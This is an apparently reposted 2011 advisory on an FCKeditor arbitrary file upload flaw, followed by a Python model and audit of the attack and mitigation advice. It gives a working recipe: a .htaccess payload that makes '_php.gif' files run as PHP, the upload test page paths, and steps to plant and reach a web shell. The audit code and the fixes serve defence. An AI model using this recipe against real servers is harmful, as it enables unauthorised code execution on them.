FCKeditor arbitrary file upload vulnerability (all PHP versions)
Author: anonymous   Source: compiled by this site   Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create a .htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
2. Now upload this .htaccess with FCKeditor, through one of its upload test pages:
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
———————————————————————————————-
3. Now upload shell.php.gif with FCKeditor.
4. After the upload, the name "shell.php.gif" is changed to "shell_php.gif" automatically (the connector replaces the dots in the base name with underscores and keeps only the last extension).
5. http://www.sinesafe.cn/anything/shell_php.gif
6. The shell is now reachable on the server: the uploaded .htaccess tells Apache to hand every file matching "_php.gif" to the PHP handler, so the rename does not protect anything. This only works where the upload directory's AllowOverride setting lets a .htaccess use SetHandler (FileInfo).
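The chain above, modelled in Python as an added example (this is not code from the advisory or from FCKeditor): it reproduces the rename the advisory describes, parses the uploaded .htaccess for FilesMatch blocks that route files to a PHP handler, and then audits a constructed upload-directory listing the way a defender would, reporting the .htaccess and every stored file that Apache would execute as PHP. The rename rule (every dot in the base name becomes an underscore, the last extension is kept) is an assumption drawn from steps 4 and 5; the directory listing and the file contents are constructed, not captured.

```python
import re
from typing import Dict, List

# The .htaccess the advisory uploads in step 1 (same content, plain quotes).
HTACCESS_PAYLOAD = (
    '<FilesMatch "_php.gif">\n'
    'SetHandler application/x-httpd-php\n'
    '</FilesMatch>\n'
)

# Assumption: the connector keeps the last extension and replaces every
# other dot with '_', so shell.php.gif -> shell_php.gif and .htaccess
# (no base name) is stored unchanged.
def rename_like_fckeditor(name: str) -> str:
    base, dot, ext = name.rpartition(".")
    if not dot:
        return name
    return base.replace(".", "_") + "." + ext


# <FilesMatch "regex"> ... </FilesMatch> blocks and SetHandler lines.
FILESMATCH_RE = re.compile(r'<FilesMatch\s+"([^"]+)"\s*>(.*?)</FilesMatch>',
                           re.S | re.I)
SETHANDLER_RE = re.compile(r'^\s*SetHandler\s+(\S+)', re.M | re.I)


def php_handler_patterns(htaccess: str) -> List[str]:
    """FilesMatch regexes in this .htaccess whose block sets a PHP handler."""
    patterns = []
    for pattern, body in FILESMATCH_RE.findall(htaccess):
        for handler in SETHANDLER_RE.findall(body):
            if "php" in handler.lower():
                patterns.append(pattern)
    return patterns


def served_as_php(stored_name: str, htaccess: str) -> bool:
    """True if Apache, honouring this .htaccess, hands stored_name to PHP.
    FilesMatch is an unanchored regex match, like re.search here."""
    return any(re.search(p, stored_name) for p in php_handler_patterns(htaccess))


def audit_upload_dir(listing: Dict[str, str]) -> List[str]:
    """Defender-side check over {filename: content}: flag an uploaded
    .htaccess that installs a PHP handler and each file it would execute."""
    findings = []
    htaccess = listing.get(".htaccess", "")
    patterns = php_handler_patterns(htaccess)
    if patterns:
        findings.append(".htaccess maps %s to a PHP handler" % ", ".join(patterns))
    for name in listing:
        if name != ".htaccess" and served_as_php(name, htaccess):
            findings.append("%s would execute as PHP" % name)
    return findings


# Constructed listing of the upload directory after steps 2 and 3.
SAMPLE_LISTING = {
    rename_like_fckeditor(".htaccess"): HTACCESS_PAYLOAD,
    rename_like_fckeditor("shell.php.gif"): "GIF89a<?php /* constructed */ ?>",
    rename_like_fckeditor("photo.jpg"): "",
}

if __name__ == "__main__":
    for finding in audit_upload_dir(SAMPLE_LISTING):
        print(finding)
```

The audit is the check to run against any directory that FCKeditor (or any other uploader) writes into: a .htaccess that a web user can create is a code-execution primitive on its own, independent of which image extensions the uploader allows, which is why the rename in step 4 is no defence. The practical fix is to serve uploads from a location with AllowOverride None and no PHP handler, and to reject dotfiles outright.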